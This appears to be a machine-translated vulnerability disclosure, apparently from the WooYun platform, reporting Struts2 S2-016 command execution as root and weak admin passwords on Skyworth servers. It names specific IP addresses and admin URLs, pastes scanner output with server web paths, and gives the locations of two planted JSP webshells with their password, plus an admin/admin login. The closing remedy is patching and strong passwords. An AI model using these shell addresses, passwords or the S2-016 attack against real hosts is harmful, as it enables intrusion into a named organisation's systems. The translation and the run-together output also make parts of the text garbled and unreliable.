One weak password system vulnerability package for executing two commands in skyworth can threaten the Intranet.
Vulnerability packaging (2 command executions & 1 weak password), 20rank on the list
Http: // 119.147.144.221: 8000/admin/login. action
Command Execution #1
Command Execution #2 (different ports)
Http: // 119.147.144.221/admin/adminLogin. action
Target: http://119.147.144.221:8000/admin/login.actionUseage: S2-016 Whoami: rootWebPath: /usr/local/jboss-eap-6.3/standalone/tmp/vfs/deployment/deploymentfd6af332f19a8366/hems.war-f874007891b8b9f5/====================================================================================================================================Target: http://119.147.144.221/admin/adminLogin.actionUseage: S2-016 Whoami: rootWebPath: /vagrant/usr/local/jboss-eap-6.2/standalone/tmp/vfs/deployment/deploymentbf1f9d568285195d/admin.war-2a1bb8848eee8a63/====================================================================================================================================
Shell
Pony address: http: // 119.147.144.221/admin/one. jsp
One sentence: http: // 119.147.144.221/admin/wooyun. jsp
Password: 023
Weak Password #3
Http: // 119.147.144.222/admin/
Account admin password admin
I think it's serious. What do you think?
Solution:
St patch & Strong Password